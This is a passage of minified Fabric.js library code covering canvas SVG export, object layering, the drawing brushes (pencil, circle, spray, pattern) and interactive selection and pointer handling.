O&&!O.excludeFromExport&&(U.clipPath=this._toObject(this.clipPath,x,S)),E(U,this.__serializeBgOverlay(x,S)),j.util.populateWithProperties(this,U,S),U},_toObjects:function(x,S){return this._objects.filter(function(O){return!O.excludeFromExport}).map(function(O){return this._toObject(O,x,S)},this)},_toObject:function(x,S,O){var U;this.includeDefaultValues||(U=x.includeDefaultValues,x.includeDefaultValues=!1);var K=x[S](O);return this.includeDefaultValues||(x.includeDefaultValues=U),K},__serializeBgOverlay:function(x,S){var O={},U=this.backgroundImage,K=this.overlayImage,ee=this.backgroundColor,se=this.overlayColor;return ee&&ee.toObject?ee.excludeFromExport||(O.background=ee.toObject(S)):ee&&(O.background=ee),se&&se.toObject?se.excludeFromExport||(O.overlay=se.toObject(S)):se&&(O.overlay=se),U&&!U.excludeFromExport&&(O.backgroundImage=this._toObject(U,x,S)),K&&!K.excludeFromExport&&(O.overlayImage=this._toObject(K,x,S)),O},svgViewportTransformation:!0,toSVG:function(x,S){x||(x={}),x.reviver=S;var O=[];return this._setSVGPreamble(O,x),this._setSVGHeader(O,x),this.clipPath&&O.push('<g clip-path="url(#'+this.clipPath.clipPathId+')" >\n'),this._setSVGBgOverlayColor(O,"background"),this._setSVGBgOverlayImage(O,"backgroundImage",S),this._setSVGObjects(O,S),this.clipPath&&O.push("</g>\n"),this._setSVGBgOverlayColor(O,"overlay"),this._setSVGBgOverlayImage(O,"overlayImage",S),O.push("</svg>"),O.join("")},_setSVGPreamble:function(x,S){S.suppressPreamble||x.push('<?xml version="1.0" encoding="',S.encoding||"UTF-8",'" standalone="no" ?>\n','<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" ','"http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">\n')},_setSVGHeader:function(x,S){var K,O=S.width||this.width,U=S.height||this.height,ee='viewBox="0 0 '+this.width+" "+this.height+'" ',se=j.Object.NUM_FRACTION_DIGITS;S.viewBox?ee='viewBox="'+S.viewBox.x+" "+S.viewBox.y+" "+S.viewBox.width+" "+S.viewBox.height+'" ':this.svgViewportTransformation&&(ee='viewBox="'+_(-(K=this.viewportTransform)[4]/K[0],se)+" "+_(-K[5]/K[3],se)+" "+_(this.width/K[0],se)+" "+_(this.height/K[3],se)+'" '),x.push("<svg ",'xmlns="http://www.w3.org/2000/svg" ','xmlns:xlink="http://www.w3.org/1999/xlink" ','version="1.1" ','width="',O,'" ','height="',U,'" ',ee,'xml:space="preserve">\n',"<desc>Created with Fabric.js ",j.version,"</desc>\n","<defs>\n",this.createSVGFontFacesMarkup(),this.createSVGRefElementsMarkup(),this.createSVGClipPathMarkup(S),"</defs>\n")},createSVGClipPathMarkup:function(x){var S=this.clipPath;return S?(S.clipPathId="CLIPPATH_"+j.Object.__uid++,'<clipPath id="'+S.clipPathId+'" >\n'+this.clipPath.toClipPathSVG(x.reviver)+"</clipPath>\n"):""},createSVGRefElementsMarkup:function(){var x=this;return["background","overlay"].map(function(O){var U=x[O+"Color"];if(U&&U.toLive){var K=x[O+"Vpt"],ee=x.viewportTransform;return U.toSVG({width:x.width/(K?ee[0]:1),height:x.height/(K?ee[3]:1)},{additionalTransform:K?j.util.matrixToSVG(ee):""})}}).join("")},createSVGFontFacesMarkup:function(){var O,U,K,ee,se,le,ye,z,x="",S={},l=j.fontPaths,f=[];for(this._objects.forEach(function v(P){f.push(P),P._objects&&P._objects.forEach(v)}),ye=0,z=f.length;ye<z;ye++)if(U=(O=f[ye]).fontFamily,-1!==O.type.indexOf("text")&&!S[U]&&l[U]&&(S[U]=!0,O.styles))for(se in K=O.styles)for(le in ee=K[se])!S[U=ee[le].fontFamily]&&l[U]&&(S[U]=!0);for(var A in S)x+=["\t\t@font-face {\n","\t\t\tfont-family: '",A,"';\n","\t\t\tsrc: url('",l[A],"');\n","\t\t}\n"].join("");return x&&(x=['\t<style type="text/css">',"<![CDATA[\n",x,"]]>","</style>\n"].join("")),x},_setSVGObjects:function(x,S){var O,U,K,ee=this._objects;for(U=0,K=ee.length;U<K;U++)!(O=ee[U]).excludeFromExport&&this._setSVGObject(x,O,S)},_setSVGObject:function(x,S,O){x.push(S.toSVG(O))},_setSVGBgOverlayImage:function(x,S,O){this[S]&&!this[S].excludeFromExport&&this[S].toSVG&&x.push(this[S].toSVG(O))},_setSVGBgOverlayColor:function(x,S){var O=this[S+"Color"],K=this.width,ee=this.height;if(O)if(O.toLive){var se=O.repeat,ve=j.util.invertTransform(this.viewportTransform),ye=this[S+"Vpt"]?j.util.matrixToSVG(ve):"";x.push('<rect transform="'+ye+" translate(",K/2,",",ee/2,')"',' x="',O.offsetX-K/2,'" y="',O.offsetY-ee/2,'" ','width="',"repeat-y"===se||"no-repeat"===se?O.source.width:K,'" height="',"repeat-x"===se||"no-repeat"===se?O.source.height:ee,'" fill="url(#SVGID_'+O.id+')"',"></rect>\n")}else x.push('<rect x="0" y="0" width="100%" height="100%" ','fill="',O,'"',"></rect>\n")},sendToBack:function(x){if(!x)return this;var O,U,K,S=this._activeObject;if(x===S&&"activeSelection"===x.type)for(O=(K=S._objects).length;O--;)b(this._objects,U=K[O]),this._objects.unshift(U);else b(this._objects,x),this._objects.unshift(x);return this.renderOnAddRemove&&this.requestRenderAll(),this},bringToFront:function(x){if(!x)return this;var O,U,K,S=this._activeObject;if(x===S&&"activeSelection"===x.type)for(K=S._objects,O=0;O<K.length;O++)b(this._objects,U=K[O]),this._objects.push(U);else b(this._objects,x),this._objects.push(x);return this.renderOnAddRemove&&this.requestRenderAll(),this},sendBackwards:function(x,S){if(!x)return this;var U,K,ee,se,ve,O=this._activeObject,le=0;if(x===O&&"activeSelection"===x.type)for(ve=O._objects,U=0;U<ve.length;U++)(ee=this._objects.indexOf(K=ve[U]))>0+le&&(se=ee-1,b(this._objects,K),this._objects.splice(se,0,K)),le++;else 0!==(ee=this._objects.indexOf(x))&&(se=this._findNewLowerIndex(x,ee,S),b(this._objects,x),this._objects.splice(se,0,x));return this.renderOnAddRemove&&this.requestRenderAll(),this},_findNewLowerIndex:function(x,S,O){var U,K;if(O){for(U=S,K=S-1;K>=0;--K)if(x.intersectsWithObject(this._objects[K])||x.isContainedWithinObject(this._objects[K])||this._objects[K].isContainedWithinObject(x)){U=K;break}}else U=S-1;return U},bringForward:function(x,S){if(!x)return this;var U,K,ee,se,ve,O=this._activeObject,le=0;if(x===O&&"activeSelection"===x.type)for(U=(ve=O._objects).length;U--;)(ee=this._objects.indexOf(K=ve[U]))<this._objects.length-1-le&&(se=ee+1,b(this._objects,K),this._objects.splice(se,0,K)),le++;else(ee=this._objects.indexOf(x))!==this._objects.length-1&&(se=this._findNewUpperIndex(x,ee,S),b(this._objects,x),this._objects.splice(se,0,x));return this.renderOnAddRemove&&this.requestRenderAll(),this},_findNewUpperIndex:function(x,S,O){var U,K,ee;if(O){for(U=S,K=S+1,ee=this._objects.length;K<ee;++K)if(x.intersectsWithObject(this._objects[K])||x.isContainedWithinObject(this._objects[K])||this._objects[K].isContainedWithinObject(x)){U=K;break}}else U=S+1;return U},moveTo:function(x,S){return b(this._objects,x),this._objects.splice(S,0,x),this.renderOnAddRemove&&this.requestRenderAll()},dispose:function(){return this.isRendering&&(j.util.cancelAnimFrame(this.isRendering),this.isRendering=0),this.forEachObject(function(x){x.dispose&&x.dispose()}),this._objects=[],this.backgroundImage&&this.backgroundImage.dispose&&this.backgroundImage.dispose(),this.backgroundImage=null,this.overlayImage&&this.overlayImage.dispose&&this.overlayImage.dispose(),this.overlayImage=null,this._iTextInstances=null,this.contextContainer=null,this.lowerCanvasEl.classList.remove("lower-canvas"),j.util.setStyle(this.lowerCanvasEl,this._originalCanvasStyle),delete this._originalCanvasStyle,this.lowerCanvasEl.setAttribute("width",this.width),this.lowerCanvasEl.setAttribute("height",this.height),j.util.cleanUpJsdomNode(this.lowerCanvasEl),this.lowerCanvasEl=void 0,this},toString:function(){return"#<fabric.Canvas ("+this.complexity()+"): { objects: "+this._objects.length+" }>"}}),E(j.StaticCanvas.prototype,j.Observable),E(j.StaticCanvas.prototype,j.Collection),E(j.StaticCanvas.prototype,j.DataURLExporter),E(j.StaticCanvas,{EMPTY_JSON:'{"objects": [], "background": "white"}',supports:function(x){var S=D();if(!S||!S.getContext)return null;var O=S.getContext("2d");return O&&"setLineDash"===x?void 0!==O.setLineDash:null}}),j.StaticCanvas.prototype.toJSON=j.StaticCanvas.prototype.toObject,j.isLikelyNode&&(j.StaticCanvas.prototype.createPNGStream=function(){var x=p(this.lowerCanvasEl);return x&&x.createPNGStream()},j.StaticCanvas.prototype.createJPEGStream=function(x){var S=p(this.lowerCanvasEl);return S&&S.createJPEGStream(x)})}}(),j.BaseBrush=j.util.createClass({color:"rgb(0, 0, 0)",width:1,shadow:null,strokeLineCap:"round",strokeLineJoin:"round",strokeMiterLimit:10,strokeDashArray:null,limitedToCanvasSize:!1,_setBrushStyles:function(E){E.strokeStyle=this.color,E.lineWidth=this.width,E.lineCap=this.strokeLineCap,E.miterLimit=this.strokeMiterLimit,E.lineJoin=this.strokeLineJoin,E.setLineDash(this.strokeDashArray||[])},_saveAndTransform:function(E){var g=this.canvas.viewportTransform;E.save(),E.transform(g[0],g[1],g[2],g[3],g[4],g[5])},_setShadow:function(){if(this.shadow){var E=this.canvas,g=this.shadow,b=E.contextTop,_=E.getZoom();E&&E._isRetinaScaling()&&(_*=j.devicePixelRatio),b.shadowColor=g.color,b.shadowBlur=g.blur*_,b.shadowOffsetX=g.offsetX*_,b.shadowOffsetY=g.offsetY*_}},needsFullRender:function(){return new j.Color(this.color).getAlpha()<1||!!this.shadow},_resetShadow:function(){var E=this.canvas.contextTop;E.shadowColor="",E.shadowBlur=E.shadowOffsetX=E.shadowOffsetY=0},_isOutSideCanvas:function(E){return E.x<0||E.x>this.canvas.getWidth()||E.y<0||E.y>this.canvas.getHeight()}}),j.PencilBrush=j.util.createClass(j.BaseBrush,{decimate:.4,drawStraightLine:!1,straightLineKey:"shiftKey",initialize:function(E){this.canvas=E,this._points=[]},needsFullRender:function(){return this.callSuper("needsFullRender")||this._hasStraightLine},_drawSegment:function(E,g,b){var _=g.midPointFrom(b);return E.quadraticCurveTo(g.x,g.y,_.x,_.y),_},onMouseDown:function(E,g){!this.canvas._isMainEvent(g.e)||(this.drawStraightLine=g.e[this.straightLineKey],this._prepareForDrawing(E),this._captureDrawingPath(E),this._render())},onMouseMove:function(E,g){if(this.canvas._isMainEvent(g.e)&&(this.drawStraightLine=g.e[this.straightLineKey],(!0!==this.limitedToCanvasSize||!this._isOutSideCanvas(E))&&this._captureDrawingPath(E)&&this._points.length>1))if(this.needsFullRender())this.canvas.clearContext(this.canvas.contextTop),this._render();else{var b=this._points,_=b.length,y=this.canvas.contextTop;this._saveAndTransform(y),this.oldEnd&&(y.beginPath(),y.moveTo(this.oldEnd.x,this.oldEnd.y)),this.oldEnd=this._drawSegment(y,b[_-2],b[_-1],!0),y.stroke(),y.restore()}},onMouseUp:function(E){return!this.canvas._isMainEvent(E.e)||(this.drawStraightLine=!1,this.oldEnd=void 0,this._finalizeAndAddPath(),!1)},_prepareForDrawing:function(E){var g=new j.Point(E.x,E.y);this._reset(),this._addPoint(g),this.canvas.contextTop.moveTo(g.x,g.y)},_addPoint:function(E){return!(this._points.length>1&&E.eq(this._points[this._points.length-1])||(this.drawStraightLine&&this._points.length>1&&(this._hasStraightLine=!0,this._points.pop()),this._points.push(E),0))},_reset:function(){this._points=[],this._setBrushStyles(this.canvas.contextTop),this._setShadow(),this._hasStraightLine=!1},_captureDrawingPath:function(E){var g=new j.Point(E.x,E.y);return this._addPoint(g)},_render:function(E){var g,b,_=this._points[0],y=this._points[1];if(this._saveAndTransform(E=E||this.canvas.contextTop),E.beginPath(),2===this._points.length&&_.x===y.x&&_.y===y.y){var M=this.width/1e3;_=new j.Point(_.x,_.y),y=new j.Point(y.x,y.y),_.x-=M,y.x+=M}for(E.moveTo(_.x,_.y),g=1,b=this._points.length;g<b;g++)this._drawSegment(E,_,y),_=this._points[g],y=this._points[g+1];E.lineTo(_.x,_.y),E.stroke(),E.restore()},convertPointsToSVGPath:function(E){return j.util.getSmoothPathFromPoints(E,this.width/1e3)},_isEmptySVGPath:function(E){return"M 0 0 Q 0 0 0 0 L 0 0"===j.util.joinPath(E)},createPath:function(E){var g=new j.Path(E,{fill:null,stroke:this.color,strokeWidth:this.width,strokeLineCap:this.strokeLineCap,strokeMiterLimit:this.strokeMiterLimit,strokeLineJoin:this.strokeLineJoin,strokeDashArray:this.strokeDashArray});return this.shadow&&(this.shadow.affectStroke=!0,g.shadow=new j.Shadow(this.shadow)),g},decimatePoints:function(E,g){if(E.length<=2)return E;var y,b=this.canvas.getZoom(),_=Math.pow(g/b,2),M=E.length-1,p=E[0],D=[p];for(y=1;y<M-1;y++)Math.pow(p.x-E[y].x,2)+Math.pow(p.y-E[y].y,2)>=_&&D.push(p=E[y]);return D.push(E[M]),D},_finalizeAndAddPath:function(){this.canvas.contextTop.closePath(),this.decimate&&(this._points=this.decimatePoints(this._points,this.decimate));var g=this.convertPointsToSVGPath(this._points);if(this._isEmptySVGPath(g))this.canvas.requestRenderAll();else{var b=this.createPath(g);this.canvas.clearContext(this.canvas.contextTop),this.canvas.fire("before:path:created",{path:b}),this.canvas.add(b),this.canvas.requestRenderAll(),b.setCoords(),this._resetShadow(),this.canvas.fire("path:created",{path:b})}}}),j.CircleBrush=j.util.createClass(j.BaseBrush,{width:10,initialize:function(E){this.canvas=E,this.points=[]},drawDot:function(E){var g=this.addPoint(E),b=this.canvas.contextTop;this._saveAndTransform(b),this.dot(b,g),b.restore()},dot:function(E,g){E.fillStyle=g.fill,E.beginPath(),E.arc(g.x,g.y,g.radius,0,2*Math.PI,!1),E.closePath(),E.fill()},onMouseDown:function(E){this.points.length=0,this.canvas.clearContext(this.canvas.contextTop),this._setShadow(),this.drawDot(E)},_render:function(){var g,b,E=this.canvas.contextTop,_=this.points;for(this._saveAndTransform(E),g=0,b=_.length;g<b;g++)this.dot(E,_[g]);E.restore()},onMouseMove:function(E){!0===this.limitedToCanvasSize&&this._isOutSideCanvas(E)||(this.needsFullRender()?(this.canvas.clearContext(this.canvas.contextTop),this.addPoint(E),this._render()):this.drawDot(E))},onMouseUp:function(){var g,b,E=this.canvas.renderOnAddRemove;this.canvas.renderOnAddRemove=!1;var _=[];for(g=0,b=this.points.length;g<b;g++){var y=this.points[g],M=new j.Circle({radius:y.radius,left:y.x,top:y.y,originX:"center",originY:"center",fill:y.fill});this.shadow&&(M.shadow=new j.Shadow(this.shadow)),_.push(M)}var p=new j.Group(_);p.canvas=this.canvas,this.canvas.fire("before:path:created",{path:p}),this.canvas.add(p),this.canvas.fire("path:created",{path:p}),this.canvas.clearContext(this.canvas.contextTop),this._resetShadow(),this.canvas.renderOnAddRemove=E,this.canvas.requestRenderAll()},addPoint:function(E){var g=new j.Point(E.x,E.y),b=j.util.getRandomInt(Math.max(0,this.width-20),this.width+20)/2,_=new j.Color(this.color).setAlpha(j.util.getRandomInt(0,100)/100).toRgba();return g.radius=b,g.fill=_,this.points.push(g),g}}),j.SprayBrush=j.util.createClass(j.BaseBrush,{width:10,density:20,dotWidth:1,dotWidthVariance:1,randomOpacity:!1,optimizeOverlapping:!0,initialize:function(E){this.canvas=E,this.sprayChunks=[]},onMouseDown:function(E){this.sprayChunks.length=0,this.canvas.clearContext(this.canvas.contextTop),this._setShadow(),this.addSprayChunk(E),this.render(this.sprayChunkPoints)},onMouseMove:function(E){!0===this.limitedToCanvasSize&&this._isOutSideCanvas(E)||(this.addSprayChunk(E),this.render(this.sprayChunkPoints))},onMouseUp:function(){var E=this.canvas.renderOnAddRemove;this.canvas.renderOnAddRemove=!1;for(var g=[],b=0,_=this.sprayChunks.length;b<_;b++)for(var y=this.sprayChunks[b],M=0,p=y.length;M<p;M++){var D=new j.Rect({width:y[M].width,height:y[M].width,left:y[M].x+1,top:y[M].y+1,originX:"center",originY:"center",fill:this.color});g.push(D)}this.optimizeOverlapping&&(g=this._getOptimizedRects(g));var w=new j.Group(g);this.shadow&&w.set("shadow",new j.Shadow(this.shadow)),this.canvas.fire("before:path:created",{path:w}),this.canvas.add(w),this.canvas.fire("path:created",{path:w}),this.canvas.clearContext(this.canvas.contextTop),this._resetShadow(),this.canvas.renderOnAddRemove=E,this.canvas.requestRenderAll()},_getOptimizedRects:function(E){var b,_,y,g={};for(_=0,y=E.length;_<y;_++)g[b=E[_].left+""+E[_].top]||(g[b]=E[_]);var M=[];for(b in g)M.push(g[b]);return M},render:function(E){var b,_,g=this.canvas.contextTop;for(g.fillStyle=this.color,this._saveAndTransform(g),b=0,_=E.length;b<_;b++){var y=E[b];void 0!==y.opacity&&(g.globalAlpha=y.opacity),g.fillRect(y.x,y.y,y.width,y.width)}g.restore()},_render:function(){var g,b,E=this.canvas.contextTop;for(E.fillStyle=this.color,this._saveAndTransform(E),g=0,b=this.sprayChunks.length;g<b;g++)this.render(this.sprayChunks[g]);E.restore()},addSprayChunk:function(E){this.sprayChunkPoints=[];var g,b,_,M,y=this.width/2;for(M=0;M<this.density;M++){g=j.util.getRandomInt(E.x-y,E.x+y),b=j.util.getRandomInt(E.y-y,E.y+y),_=this.dotWidthVariance?j.util.getRandomInt(Math.max(1,this.dotWidth-this.dotWidthVariance),this.dotWidth+this.dotWidthVariance):this.dotWidth;var p=new j.Point(g,b);p.width=_,this.randomOpacity&&(p.opacity=j.util.getRandomInt(0,100)/100),this.sprayChunkPoints.push(p)}this.sprayChunks.push(this.sprayChunkPoints)}}),j.PatternBrush=j.util.createClass(j.PencilBrush,{getPatternSrc:function(){var b=j.util.createCanvasElement(),_=b.getContext("2d");return b.width=b.height=25,_.fillStyle=this.color,_.beginPath(),_.arc(10,10,10,0,2*Math.PI,!1),_.closePath(),_.fill(),b},getPatternSrcFunction:function(){return String(this.getPatternSrc).replace("this.color",'"'+this.color+'"')},getPattern:function(E){return E.createPattern(this.source||this.getPatternSrc(),"repeat")},_setBrushStyles:function(E){this.callSuper("_setBrushStyles",E),E.strokeStyle=this.getPattern(E)},createPath:function(E){var g=this.callSuper("createPath",E),b=g._getLeftTopCoords().scalarAdd(g.strokeWidth/2);return g.stroke=new j.Pattern({source:this.source||this.getPatternSrcFunction(),offsetX:-b.x,offsetY:-b.y}),g}}),function(){var E=j.util.getPointer,g=j.util.degreesToRadians,b=j.util.isTouchEvent;for(var _ in j.Canvas=j.util.createClass(j.StaticCanvas,{initialize:function(y,M){M||(M={}),this.renderAndResetBound=this.renderAndReset.bind(this),this.requestRenderAllBound=this.requestRenderAll.bind(this),this._initStatic(y,M),this._initInteractive(),this._createCacheCanvas()},uniformScaling:!0,uniScaleKey:"shiftKey",centeredScaling:!1,centeredRotation:!1,centeredKey:"altKey",altActionKey:"shiftKey",interactive:!0,selection:!0,selectionKey:"shiftKey",altSelectionKey:null,selectionColor:"rgba(100, 100, 255, 0.3)",selectionDashArray:[],selectionBorderColor:"rgba(255, 255, 255, 0.3)",selectionLineWidth:1,selectionFullyContained:!1,hoverCursor:"move",moveCursor:"move",defaultCursor:"default",freeDrawingCursor:"crosshair",notAllowedCursor:"not-allowed",containerClass:"canvas-container",perPixelTargetFind:!1,targetFindTolerance:0,skipTargetFind:!1,isDrawingMode:!1,preserveObjectStacking:!1,snapAngle:0,snapThreshold:null,stopContextMenu:!1,fireRightClick:!1,fireMiddleClick:!1,targets:[],enablePointerEvents:!1,_hoveredTarget:null,_hoveredTargets:[],_initInteractive:function(){this._currentTransform=null,this._groupSelector=null,this._initWrapperElement(),this._createUpperCanvas(),this._initEventListeners(),this._initRetinaScaling(),this.freeDrawingBrush=j.PencilBrush&&new j.PencilBrush(this),this.calcOffset()},_chooseObjectsToRender:function(){var M,p,D,y=this.getActiveObjects();if(y.length>0&&!this.preserveObjectStacking){p=[],D=[];for(var w=0,x=this._objects.length;w<x;w++)-1===y.indexOf(M=this._objects[w])?p.push(M):D.push(M);y.length>1&&(this._activeObject._objects=D),p.push.apply(p,D)}else p=this._objects;return p},renderAll:function(){return this.contextTopDirty&&!this._groupSelector&&!this.isDrawingMode&&(this.clearContext(this.contextTop),this.contextTopDirty=!1),this.hasLostContext&&(this.renderTopLayer(this.contextTop),this.hasLostContext=!1),this.renderCanvas(this.contextContainer,this._chooseObjectsToRender()),this},renderTopLayer:function(y){y.save(),this.isDrawingMode&&this._isCurrentlyDrawing&&(this.freeDrawingBrush&&this.freeDrawingBrush._render(),this.contextTopDirty=!0),this.selection&&this._groupSelector&&(this._drawSelection(y),this.contextTopDirty=!0),y.restore()},renderTop:function(){var y=this.contextTop;return this.clearContext(y),this.renderTopLayer(y),this.fire("after:render"),this},_normalizePointer:function(y,M){var p=y.calcTransformMatrix(),D=j.util.invertTransform(p),w=this.restorePointerVpt(M);return j.util.transformPoint(w,D)},isTargetTransparent:function(y,M,p){if(y.shouldCache()&&y._cacheCanvas&&y!==this._activeObject){var D=this._normalizePointer(y,{x:M,y:p}),w=Math.max(y.cacheTranslationX+D.x*y.zoomX,0),x=Math.max(y.cacheTranslationY+D.y*y.zoomY,0);return j.util.isTransparent(y._cacheContext,Math.round(w),Math.round(x),this.targetFindTolerance)}var S=this.contextCache,O=y.selectionBackgroundColor,U=this.viewportTransform;return y.selectionBackgroundColor="",this.clearContext(S),S.save(),S.transform(U[0],U[1],U[2],U[3],U[4],U[5]),y.render(S),S.restore(),y.selectionBackgroundColor=O,j.util.isTransparent(S,M,p,this.targetFindTolerance)},_isSelectionKeyPressed:function(y){return Array.isArray(this.selectionKey)?!!this.selectionKey.find(function(p){return!0===y[p]}):y[this.selectionKey]},_shouldClearSelection:function(y,M){var p=this.getActiveObjects(),D=this._activeObject;return!M||M&&D&&p.length>1&&-1===p.indexOf(M)&&D!==M&&!this._isSelectionKeyPressed(y)||M&&!M.evented||M&&!M.selectable&&D&&D!==M},_shouldCenterTransform:function(y,M,p){var D;if(y)return"scale"===M||"scaleX"===M||"scaleY"===M||"resizing"===M?D=this.centeredScaling||y.centeredScaling:"rotate"===M&&(D=this.centeredRotation||y.centeredRotation),D?!p:p},_getOriginFromCorner:function(y,M){var p={x:y.originX,y:y.originY};return"ml"===M||"tl"===M||"bl"===M?p.x="right":("mr"===M||"tr"===M||"br"===M)&&(p.x="left"),"tl"===M||"mt"===M||"tr"===M?p.y="bottom":("bl"===M||"mb"===M||"br"===M)&&(p.y="top"),p},_getActionFromCorner:function(y,M,p,D){if(!M||!y)return"drag";var w=D.controls[M];return w.getActionName(p,w,D)},_setupCurrentTransform:function(y,M,p){if(M){var D=this.getPointer(y),w=M.__corner,x=M.controls[w],S=p&&w?x.getActionHandler(y,M,x):j.controlsUtils.dragHandler,O=this._getActionFromCorner(p,w,y,M),U=this._getOriginFromCorner(M,w),K=y[this.centeredKey],ee={target:M,action:O,actionHandler:S,corner:w,scaleX:M.scaleX,scaleY:M.scaleY,skewX:M.skewX,skewY:M.skewY,offsetX:D.x-M.left,offsetY:D.y-M.top,originX:U.x,originY:U.y,ex:D.x,ey:D.y,lastX:D.x,lastY:D.y,theta:g(M.angle),width:M.width*M.scaleX,shiftKey:y.shiftKey,altKey:K,original:j.util.saveObjectTransform(M)};this._shouldCenterTransform(M,O,K)&&(ee.originX="center",ee.originY="center"),ee.original.originX=U.x,ee.original.originY=U.y,this._currentTransform=ee,this._beforeTransform(y)}},setCursor:function(y){this.upperCanvasEl.style.cursor=y},_drawSelection:function(y){var M=this._groupSelector,p=new j.Point(M.ex,M.ey),D=j.util.transformPoint(p,this.viewportTransform),w=new j.Point(M.ex+M.left,M.ey+M.top),x=j.util.transformPoint(w,this.viewportTransform),S=Math.min(D.x,x.x),O=Math.min(D.y,x.y),U=Math.max(D.x,x.x),K=Math.max(D.y,x.y),ee=this.selectionLineWidth/2;this.selectionColor&&(y.fillStyle=this.selectionColor,y.fillRect(S,O,U-S,K-O)),this.selectionLineWidth&&this.selectionBorderColor&&(y.lineWidth=this.selectionLineWidth,y.strokeStyle=this.selectionBorderColor,S+=ee,O+=ee,U-=ee,K-=ee,j.Object.prototype._setLineDash.call(this,y,this.selectionDashArray),y.strokeRect(S,O,U-S,K-O))},findTarget:function(y,M){if(!this.skipTargetFind){var S,O,D=this.getPointer(y,!0),w=this._activeObject,x=this.getActiveObjects(),U=b(y),K=x.length>1&&!M||1===x.length;if(this.targets=[],K&&w._findTargetCorner(D,U)||x.length>1&&!M&&w===this._searchPossibleTargets([w],D))return w;if(1===x.length&&w===this._searchPossibleTargets([w],D)){if(!this.preserveObjectStacking)return w;S=w,O=this.targets,this.targets=[]}var ee=this._searchPossibleTargets(this._objects,D);return y[this.altSelectionKey]&&ee&&S&&ee!==S&&(ee=S,this.targets=O),ee}},_checkTarget:function(y,M,p){if(M&&M.visible&&M.evented&&M.containsPoint(y)){if(!this.perPixelTargetFind&&!M.perPixelTargetFind||M.isEditing)return!0;if(!this.isTargetTransparent(M,p.x,p.y))return!0}},_searchPossibleTargets:function(y,M){for(var p,w,D=y.length;D--;){var x=y[D],S=x.group?this._normalizePointer(x.group,M):M;if(this._checkTarget(S,x,M)){(p=y[D]).subTargetCheck&&p instanceof j.Group&&(w=this._searchPossibleTargets(p._objects,M))&&this.targets.push(w);break}}return p},restorePointerVpt:function(y){return j.util.transformPoint(y,j.util.invertTransform(this.viewportTransform))},getPointer:function(y,M){if(this._absolutePointer&&!M)return this._absolutePointer;if(this._pointer&&M)return this._pointer;var O,p=E(y),D=this.upperCanvasEl,w=D.getBoundingClientRect(),x=w.width||0,S=w.height||0;(!x||!S)&&("top"in w&&"bottom"in w&&(S=Math.abs(w.top-w.bottom)),"right"in w&&"left"in w&&(x=Math.abs(w.right-w.left))),this.calcOffset(),p.x=p.x-this._offset.left,p.y=p.y-this._offset.top,M||(p=this.restorePointerVpt(p));var U=this.getRetinaScaling();return 1!==U&&(p.x/=U,p.y/=U),{x:p.x*(O=0===x||0===S?{width:1,height:1}:{width:D.width/x,height:D.height/S}).width,y:p.y*O.height}},_createUpperCanvas:function(){var y=this.lowerCanvasEl.className.replace(/\s*lower-canvas\s*/,""),M=this.lowerCanvasEl,p=this.upperCanvasEl;p?p.className="":(p=this._createCanvasElement(),this.upperCanvasEl=p),j.util.addClass(p,"upper-canvas "+y),this.wrapperEl.appendChild(p),this._copyCanvasStyle(M,p),this._applyCanvasStyle(p),this.contextTop=p.getContext("2d")},getTopContext:function(){return this.contextTop},_createCacheCanvas:function(){this.cacheCanvasEl=this._createCanvasElement(),this.cacheCanvasEl.setAttribute("width",this.width),this.cacheCanvasEl.setAttribute("height",this.height),this.contextCache=this.cacheCanvasEl.getContext("2d")},_initWrapperElement:function(){this.wrapperEl=j.util.wrapElement(this.lowerCanvasEl,"div",{class:this.containerClass}),j.util.setStyle(this.wrapperEl,{width:this.width+"px",height:this.height+"px",position:"relative"}),j.util.makeElementUnselectable(this.wrapperEl)},_applyCanvasStyle:function(y){var M=this.width||y.width,p=this.height||y.height;j.util.setStyle(y,{position:"absolute",width:M+"px",height:p+"px",left:0,top:0,"touch-action":this.allowTouchScrolling?"manipulation":"none","-ms-touch-action":this.allowTouchScrolling?"manipulation":"none"}),y.width=M,y.height=p,j.util.makeElementUnselectable(y)},_copyCanvasStyle:function(y,M){M.style.cssText=y.style.cssText},getSelectionContext:function(){return this.contextTop},getSelectionElement:function(){return this.upperCanvasEl},getActiveObject:function(){return this._activeObject},getActiveObjects:function(){var y=this._activeObject;return y?"activeSelection"===y.type&&y._objects?y._objects.slice(0):[y]:[]},_onObjectRemoved:function(y){y===this._activeObject&&(this.fire("before:selection:cleared",{target:y}),this._discardActiveObject(),this.fire("selection:cleared",{target:y}),y.fire("deselected")),y===this._hoveredTarget&&(this._hoveredTarget=null,this._hoveredTargets=[]),this.callSuper("_onObjectRemoved",y)},_fireSelectionEvents:function(y,M){var p=!1,D=this.getActiveObjects(),w=[],x=[];y.forEach(function(S){-1===D.indexOf(S)&&(p=!0,S.fire("deselected",{e:M,target:S}),x.push(S))}),D.forEach(function(S){-1===y.indexOf(S)&&(p=!0,S.fire("selected",{e:M,target:S}),w.push(S))}),y.length>0&&D.length>0?p&&this.fire("selection:updated",{e:M,selected:w,deselected:x}):D.length>0?this.fire("selection:created",{e:M,selected:w}):y.length>0&&this.fire("selection:cleared",{e:M,deselected:x})},setActiveObject:function(y,M){var p=this.getActiveObjects();return this._setActiveObject(y,M),this._fireSelectionEvents(p,M),this},_setActiveObject:function(y,M){return!(this._activeObject===y||!this._discardActiveObject(M,y)||y.onSelect({e:M})||(this._activeObject=y,0))},_discardActiveObject:function(y,M){var p=this._activeObject;if(p){if(p.onDeselect({e:y,object:M}))return!1;this._activeObject=null}return!0},discardActiveObject:function(y){var M=this.getActiveObjects(),p=this.getActiveObject();return M.length&&this.fire("before:selection:cleared",{target:p,e:y}),this._discardActiveObject(y),this._fireSelectionEvents(M,y),this},dispose:function(){var y=this.wrapperEl;return this.removeListeners(),y.removeChild(this.upperCanvasEl),y.removeChild(this.lowerCanvasEl),this.contextCache=null,this.contextTop=null,["upperCanvasEl","cacheCanvasEl"].forEach(function(M){j.util.cleanUpJsdomNode(this[M]),this[M]=void 0}.bind(this)),y.parentNode&&y.parentNode.replaceChild(this.lowerCanvasEl,this.wrapperEl),delete this.wrapperEl,j.StaticCanvas.prototype.dispose.call(this),this},clear:function(){return this.discardActiveObject(),this.clearContext(this.contextTop),this.callSuper("clear")},drawControls:function(y){var M=this._activeObject;M&&M._renderControls(y)},_toObject:function(y,M,p){var D=this._realizeGroupTransformOnObject(y),w=this.callSuper("_toObject",y,M,p);return 